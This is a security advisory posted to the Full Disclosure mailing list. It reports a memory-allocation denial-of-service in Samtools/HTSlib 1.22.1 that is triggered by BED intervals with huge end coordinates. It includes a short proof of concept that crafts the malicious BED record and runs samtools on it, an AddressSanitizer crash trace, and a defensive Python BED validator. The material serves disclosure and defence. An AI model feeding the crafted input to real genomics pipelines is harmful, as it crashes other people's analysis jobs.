Full Disclosure mailing list archives

Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib


From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 28 Sep 2025 12:17:19 -0400

A denial-of-service vulnerability exists in Samtools and the underlying
HTSlib when processing BED files containing extremely large interval
values. The bed_index_core() function in bedidx.c uses the interval end
coordinate to calculate allocation size without sufficient validation. By
supplying a BED record with a crafted end coordinate (e.g., near 2^61), an
attacker can trigger uncontrolled memory allocation requests via
hts_resize_array_(). This leads to process termination due to failed
allocations, effectively causing a denial of service. This issue can be
exploited by tricking a user or automated pipeline into loading a malicious
BED file with oversized intervals (e.g., via the -L option of samtools
view).
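A pre-flight check that a pipeline can run on a BED file before handing it to samtools -L, added here as an example (it is not samtools or HTSlib code). The coordinate cap and the use of a .fai index for per-contig lengths are assumptions; the sample records are constructed and include the oversized interval from this advisory.

```python
# Constructed sample: one normal record, the oversized interval from the
# advisory, an inverted interval and a negative start.
SAMPLE_BED = """chr1\t100\t200
chr1\t0\t2305843009213693940
chr2\t500\t400
chr3\t-5\t10
"""

# Assumption: a generic cap on end coordinates used when no contig lengths
# are known. Lengths from a .fai index are the stricter check when available.
DEFAULT_MAX_END = 2**31 - 1

def parse_fai(text):
    """Parse samtools faidx (.fai) text into {contig: length} (assumed format:
    name<TAB>length<TAB>...)."""
    lengths = {}
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) >= 2:
            lengths[fields[0]] = int(fields[1])
    return lengths

def check_bed(text, contig_lengths=None, max_end=DEFAULT_MAX_END):
    """Return [(line_number, reason)] for records that should not reach
    samtools -L. Comment, track and browser lines are skipped as in BED."""
    problems = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith(("#", "track", "browser")):
            continue
        f = line.split("\t")
        if len(f) < 3:
            problems.append((n, "fewer than 3 columns"))
            continue
        try:
            start, end = int(f[1]), int(f[2])
        except ValueError:
            problems.append((n, "non-integer coordinate"))
            continue
        if start < 0:
            problems.append((n, "negative start"))
        elif end <= start:
            problems.append((n, "end <= start"))
        elif contig_lengths is not None and f[0] not in contig_lengths:
            problems.append((n, "unknown contig"))
        elif contig_lengths is not None and end > contig_lengths[f[0]]:
            problems.append((n, "end beyond contig length"))
        elif end > max_end:
            problems.append((n, f"end {end} exceeds cap {max_end}"))
    return problems
```

A non-empty result means the file should be rejected before any samtools process allocates an index for it.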

*Impact*

   - Denial-of-Service (DoS)

*Proof of Concept:*

# Craft a BED record with an oversized interval
echo -e "chr1\t0\t2305843009213693940" > bad.bed

# Trigger the DoS with samtools
samtools view -L bad.bed big.bam



*Output:*

=================================================================
==1060879==ERROR: AddressSanitizer: requested allocation size 0x10000000000000 (0x10000000001000 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0xaad05674fd5c in realloc (/root/samtools/samtools+0xdfd5c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)
    #1 0xaad0568afc64 in hts_resize_array_ /root/htslib/hts.c:5070:15
    #2 0xaad056873d80 in bed_index_core /root/samtools/bedidx.c:120:13
    #3 0xaad056873d80 in bed_index /root/samtools/bedidx.c:149:17
    #4 0xaad056872780 in bed_read /root/samtools/bedidx.c:348:9
    #5 0xaad0567958b4 in main_samview /root/samtools/sam_view.c:1066:33
    #6 0xaad0567d5b40 in main /root/samtools/bamtk.c:246:55
    #7 0xfffaacef2290 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #8 0xfffaacef2374 in __libc_start_main csu/../csu/libc-start.c:360:3
    #9 0xaad0566acc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/